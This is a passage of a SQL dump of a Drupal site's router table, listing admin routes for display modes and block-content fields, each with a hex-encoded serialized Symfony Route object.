e65223b733a33393a222f61646d696e2f636f6e6669672f70656f706c652f6163636f756e74732f646973706c61792f25223b733a383a226e756d5061727473223b693a363b7d7d, 6),
('entity.entity_view_mode.add_form', '/admin/structure/display-modes/view/add/{entity_type_id}', '/admin/structure/display-modes/view/add/%', 62, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a35363a222f61646d696e2f7374727563747572652f646973706c61792d6d6f6465732f766965772f6164642f7b656e746974795f747970655f69647d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f666f726d223b733a32303a22656e746974795f766965775f6d6f64652e616464223b733a363a225f7469746c65223b733a31333a224164642076696577206d6f6465223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32343a2261646d696e697374657220646973706c6179206d6f646573223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31343a22656e746974795f747970655f6964223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a37343a227b5e2f61646d696e2f7374727563747572652f646973706c61795c2d6d6f6465732f766965772f6164642f283f503c656e746974795f747970655f69643e5b5e2f5d2b2b29247d734475223b733a31313a22706174685f746f6b656e73223b613a323a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31343a22656e746974795f747970655f6964223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a33393a222f61646d696e2f7374727563747572652f646973706c61792d6d6f6465732f766965772f616464223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31343a22656e746974795f747970655f6964223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36323b733a31343a227061747465726e4f75746c696e65223b733a34313a222f61646d696e2f7374727563747572652f646973706c61792d6d6f6465732f766965772f6164642f25223b733a383a226e756d5061727473223b693a363b7d7d, 6),
('entity.entity_view_mode.collection', '/admin/structure/display-modes/view', '/admin/structure/display-modes/view', 15, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a33353a222f61646d696e2f7374727563747572652f646973706c61792d6d6f6465732f76696577223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f6c697374223b733a31363a22656e746974795f766965775f6d6f6465223b733a363a225f7469746c65223b733a31303a2256696577206d6f646573223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32343a2261646d696e697374657220646973706c6179206d6f646573223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a34333a227b5e2f61646d696e2f7374727563747572652f646973706c61795c2d6d6f6465732f76696577247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a33353a222f61646d696e2f7374727563747572652f646973706c61792d6d6f6465732f76696577223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31353b733a31343a227061747465726e4f75746c696e65223b733a33353a222f61646d696e2f7374727563747572652f646973706c61792d6d6f6465732f76696577223b733a383a226e756d5061727473223b693a343b7d7d, 4),
('entity.entity_view_mode.config_translation_overview', '/admin/structure/display-modes/view/manage/{entity_view_mode}/translate', '/admin/structure/display-modes/view/manage/%/translate', 125, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a37313a222f61646d696e2f7374727563747572652f646973706c61792d6d6f6465732f766965772f6d616e6167652f7b656e746974795f766965775f6d6f64657d2f7472616e736c617465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a37353a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c436f6e74726f6c6c65725c436f6e6669675472616e736c6174696f6e436f6e74726f6c6c65723a3a6974656d50616765223b733a393a22706c7567696e5f6964223b733a31363a22656e746974795f766965775f6d6f6465223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33353a225f636f6e6669675f7472616e736c6174696f6e5f6f766572766965775f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31363a22656e746974795f766965775f6d6f6465223b613a323a7b733a343a2274797065223b733a32333a22656e746974793a656e746974795f766965775f6d6f6465223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33343a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e6f76657276696577223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31363a22656e746974795f766965775f6d6f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a38393a227b5e2f61646d696e2f7374727563747572652f646973706c61795c2d6d6f6465732f766965772f6d616e6167652f283f503c656e746974795f766965775f6d6f64653e5b5e2f5d2b2b292f7472616e736c617465247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31363a22656e746974795f766965775f6d6f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a34323a222f61646d696e2f7374727563747572652f646973706c61792d6d6f6465732f766965772f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31363a22656e746974795f766965775f6d6f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3132353b733a31343a227061747465726e4f75746c696e65223b733a35343a222f61646d696e2f7374727563747572652f646973706c61792d6d6f6465732f766965772f6d616e6167652f252f7472616e736c617465223b733a383a226e756d5061727473223b693a373b7d7d, 7),
('entity.entity_view_mode.delete_form', '/admin/structure/display-modes/view/manage/{entity_view_mode}/delete', '/admin/structure/display-modes/view/manage/%/delete', 125, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a36383a222f61646d696e2f7374727563747572652f646973706c61792d6d6f6465732f766965772f6d616e6167652f7b656e746974795f766965775f6d6f64657d2f64656c657465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f666f726d223b733a32333a22656e746974795f766965775f6d6f64652e64656c657465223b733a363a225f7469746c65223b733a31363a2244656c6574652076696577206d6f6465223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31343a225f656e746974795f616363657373223b733a32333a22656e746974795f766965775f6d6f64652e64656c657465223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a31363a22656e746974795f766965775f6d6f6465223b613a323a7b733a343a2274797065223b733a32333a22656e746974793a656e746974795f766965775f6d6f6465223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31363a22656e746974795f766965775f6d6f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a38363a227b5e2f61646d696e2f7374727563747572652f646973706c61795c2d6d6f6465732f766965772f6d616e6167652f283f503c656e746974795f766965775f6d6f64653e5b5e2f5d2b2b292f64656c657465247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f64656c657465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31363a22656e746974795f766965775f6d6f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a34323a222f61646d696e2f7374727563747572652f646973706c61792d6d6f6465732f766965772f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31363a22656e746974795f766965775f6d6f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3132353b733a31343a227061747465726e4f75746c696e65223b733a35313a222f61646d696e2f7374727563747572652f646973706c61792d6d6f6465732f766965772f6d616e6167652f252f64656c657465223b733a383a226e756d5061727473223b693a373b7d7d, 7),
('entity.entity_view_mode.edit_form', '/admin/structure/display-modes/view/manage/{entity_view_mode}', '/admin/structure/display-modes/view/manage/%', 62, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a36313a222f61646d696e2f7374727563747572652f646973706c61792d6d6f6465732f766965772f6d616e6167652f7b656e746974795f766965775f6d6f64657d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f666f726d223b733a32313a22656e746974795f766965775f6d6f64652e65646974223b733a363a225f7469746c65223b733a31343a22456469742076696577206d6f6465223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31343a225f656e746974795f616363657373223b733a32333a22656e746974795f766965775f6d6f64652e757064617465223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a31363a22656e746974795f766965775f6d6f6465223b613a323a7b733a343a2274797065223b733a32333a22656e746974793a656e746974795f766965775f6d6f6465223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31363a22656e746974795f766965775f6d6f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a37393a227b5e2f61646d696e2f7374727563747572652f646973706c61795c2d6d6f6465732f766965772f6d616e6167652f283f503c656e746974795f766965775f6d6f64653e5b5e2f5d2b2b29247d734475223b733a31313a22706174685f746f6b656e73223b613a323a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31363a22656e746974795f766965775f6d6f6465223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a34323a222f61646d696e2f7374727563747572652f646973706c61792d6d6f6465732f766965772f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31363a22656e746974795f766965775f6d6f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36323b733a31343a227061747465726e4f75746c696e65223b733a34343a222f61646d696e2f7374727563747572652f646973706c61792d6d6f6465732f766965772f6d616e6167652f25223b733a383a226e756d5061727473223b693a363b7d7d, 6),
('entity.field_config.block_content_field_delete_form', '/admin/structure/block-content/manage/{block_content_type}/fields/{field_config}/delete', '/admin/structure/block-content/manage/%/fields/%/delete', 245, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a38373a222f61646d696e2f7374727563747572652f626c6f636b2d636f6e74656e742f6d616e6167652f7b626c6f636b5f636f6e74656e745f747970657d2f6669656c64732f7b6669656c645f636f6e6669677d2f64656c657465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a333a7b733a31323a225f656e746974795f666f726d223b733a31393a226669656c645f636f6e6669672e64656c657465223b733a31343a22656e746974795f747970655f6964223b733a31333a22626c6f636b5f636f6e74656e74223b733a363a2262756e646c65223b733a303a22223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31343a225f656e746974795f616363657373223b733a31393a226669656c645f636f6e6669672e64656c657465223b7d733a373a226f7074696f6e73223b613a363a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a323a7b733a31383a22626c6f636b5f636f6e74656e745f74797065223b613a323a7b733a343a2274797065223b733a32353a22656e746974793a626c6f636b5f636f6e74656e745f74797065223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d733a31323a226669656c645f636f6e666967223b613a323a7b733a343a2274797065223b733a31393a22656e746974793a6669656c645f636f6e666967223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a393a225f6669656c645f7569223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31383a22626c6f636b5f636f6e74656e745f74797065223b693a313b733a31323a226669656c645f636f6e666967223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3131353a227b5e2f61646d696e2f7374727563747572652f626c6f636b5c2d636f6e74656e742f6d616e6167652f283f503c626c6f636b5f636f6e74656e745f747970653e5b5e2f5d2b2b292f6669656c64732f283f503c6669656c645f636f6e6669673e5b5e2f5d2b2b292f64656c657465247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f64656c657465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31323a226669656c645f636f6e666967223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f6669656c6473223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31383a22626c6f636b5f636f6e74656e745f74797065223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a33373a222f61646d696e2f7374727563747572652f626c6f636b2d636f6e74656e742f6d616e616765223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31383a22626c6f636b5f636f6e74656e745f74797065223b693a313b733a31323a226669656c645f636f6e666967223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3234353b733a31343a227061747465726e4f75746c696e65223b733a35353a222f61646d696e2f7374727563747572652f626c6f636b2d636f6e74656e742f6d616e6167652f252f6669656c64732f252f64656c657465223b733a383a226e756d5061727473223b693a383b7d7d, 8),
('entity.field_config.block_content_field_delete_form.bc', '/admin/structure/block/block-content/manage/{block_content_type}/fields/{field_config}/delete', '/admin/structure/block/block-content/manage/%/fields/%/delete', 501, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a39333a222f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b2d636f6e74656e742f6d616e6167652f7b626c6f636b5f636f6e74656e745f747970657d2f6669656c64732f7b6669656c645f636f6e6669677d2f64656c657465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a333a7b733a31343a22656e746974795f747970655f6964223b733a31333a22626c6f636b5f636f6e74656e74223b733a363a2262756e646c65223b733a303a22223b733a31313a225f636f6e74726f6c6c6572223b733a38313a225c44727570616c5c626c6f636b5f636f6e74656e745c436f6e74726f6c6c65725c426c6f636b436f6e74656e74436f6e74726f6c6c65723a3a626c6f636b436f6e74656e74547970655265646972656374223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31343a225f656e746974795f616363657373223b733a31393a226669656c645f636f6e6669672e64656c657465223b7d733a373a226f7074696f6e73223b613a363a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a323a7b733a31383a22626c6f636b5f636f6e74656e745f74797065223b613a323a7b733a343a2274797065223b733a32353a22656e746974793a626c6f636b5f636f6e74656e745f74797065223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d733a31323a226669656c645f636f6e666967223b613a323a7b733a343a2274797065223b733a31393a22656e746974793a6669656c645f636f6e666967223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a393a225f6669656c645f7569223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31383a22626c6f636b5f636f6e74656e745f74797065223b693a313b733a31323a226669656c645f636f6e666967223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3132313a227b5e2f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b5c2d636f6e74656e742f6d616e6167652f283f503c626c6f636b5f636f6e74656e745f747970653e5b5e2f5d2b2b292f6669656c64732f283f503c6669656c645f636f6e6669673e5b5e2f5d2b2b292f64656c657465247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f64656c657465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31323a226669656c645f636f6e666967223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f6669656c6473223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31383a22626c6f636b5f636f6e74656e745f74797065223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a34333a222f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b2d636f6e74656e742f6d616e616765223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31383a22626c6f636b5f636f6e74656e745f74797065223b693a313b733a31323a226669656c645f636f6e666967223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3530313b733a31343a227061747465726e4f75746c696e65223b733a36313a222f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b2d636f6e74656e742f6d616e6167652f252f6669656c64732f252f64656c657465223b733a383a226e756d5061727473223b693a393b7d7d, 9),
('entity.field_config.block_content_field_edit_form', '/admin/structure/block-content/manage/{block_content_type}/fields/{field_config}', '/admin/structure/block-content/manage/%/fields/%', 122, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a38303a222f61646d696e2f7374727563747572652f626c6f636b2d636f6e74656e742f6d616e6167652f7b626c6f636b5f636f6e74656e745f747970657d2f6669656c64732f7b6669656c645f636f6e6669677d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a343a7b733a31323a225f656e746974795f666f726d223b733a31373a226669656c645f636f6e6669672e65646974223b733a31353a225f7469746c655f63616c6c6261636b223b733a35313a225c44727570616c5c6669656c645f75695c466f726d5c4669656c64436f6e66696745646974466f726d3a3a6765745469746c65223b733a31343a22656e746974795f747970655f6964223b733a31333a22626c6f636b5f636f6e74656e74223b733a363a2262756e646c65223b733a303a22223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31343a225f656e746974795f616363657373223b733a31393a226669656c645f636f6e6669672e757064617465223b7d733a373a226f7074696f6e73223b613a363a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a323a7b733a31383a22626c6f636b5f636f6e74656e745f74797065223b613a323a7b733a343a2274797065223b733a32353a22656e746974793a626c6f636b5f636f6e74656e745f74797065223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d733a31323a226669656c645f636f6e666967223b613a323a7b733a343a2274797065223b733a31393a22656e746974793a6669656c645f636f6e666967223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a393a225f6669656c645f7569223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31383a22626c6f636b5f636f6e74656e745f74797065223b693a313b733a31323a226669656c645f636f6e666967223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3130383a227b5e2f61646d696e2f7374727563747572652f626c6f636b5c2d636f6e74656e742f6d616e6167652f283f503c626c6f636b5f636f6e74656e745f747970653e5b5e2f5d2b2b292f6669656c64732f283f503c6669656c645f636f6e6669673e5b5e2f5d2b2b29247d734475223b733a31313a22706174685f746f6b656e73223b613a343a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31323a226669656c645f636f6e666967223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f6669656c6473223b7d693a323b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31383a22626c6f636b5f636f6e74656e745f74797065223b693a343b623a313b7d693a333b613a323a7b693a303b733a343a2274657874223b693a313b733a33373a222f61646d696e2f7374727563747572652f626c6f636b2d636f6e74656e742f6d616e616765223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31383a22626c6f636b5f636f6e74656e745f74797065223b693a313b733a31323a226669656c645f636f6e666967223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3132323b733a31343a227061747465726e4f75746c696e65223b733a34383a222f61646d696e2f7374727563747572652f626c6f636b2d636f6e74656e742f6d616e6167652f252f6669656c64732f25223b733a383a226e756d5061727473223b693a373b7d7d, 7),
('entity.field_config.block_content_field_edit_form.bc', '/admin/structure/block/block-content/manage/{block_content_type}/fields/{field_config}', '/admin/structure/block/block-content/manage/%/fields/%', 250, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a38363a222f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b2d636f6e74656e742f6d616e6167652f7b626c6f636b5f636f6e74656e745f747970657d2f6669656c64732f7b6669656c645f636f6e6669677d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a343a7b733a31353a225f7469746c655f63616c6c6261636b223b733a35313a225c44727570616c5c6669656c645f75695c466f726d5c4669656c64436f6e66696745646974466f726d3a3a6765745469746c65223b733a31343a22656e746974795f747970655f6964223b733a31333a22626c6f636b5f636f6e74656e74223b733a363a2262756e646c65223b733a303a22223b733a31313a225f636f6e74726f6c6c6572223b733a38313a225c44727570616c5c626c6f636b5f636f6e74656e745c436f6e74726f6c6c65725c426c6f636b436f6e74656e74436f6e74726f6c6c65723a3a626c6f636b436f6e74656e74547970655265646972656374223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31343a225f656e746974795f616363657373223b733a31393a226669656c645f636f6e6669672e757064617465223b7d733a373a226f7074696f6e73223b613a363a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a323a7b733a31383a22626c6f636b5f636f6e74656e745f74797065223b613a323a7b733a343a2274797065223b733a32353a22656e746974793a626c6f636b5f636f6e74656e745f74797065223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d733a31323a226669656c645f636f6e666967223b613a323a7b733a343a2274797065223b733a31393a22656e746974793a6669656c645f636f6e666967223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a393a225f6669656c645f7569223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31383a22626c6f636b5f636f6e74656e745f74797065223b693a313b733a31323a226669656c645f636f6e666967223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3131343a227b5e2f61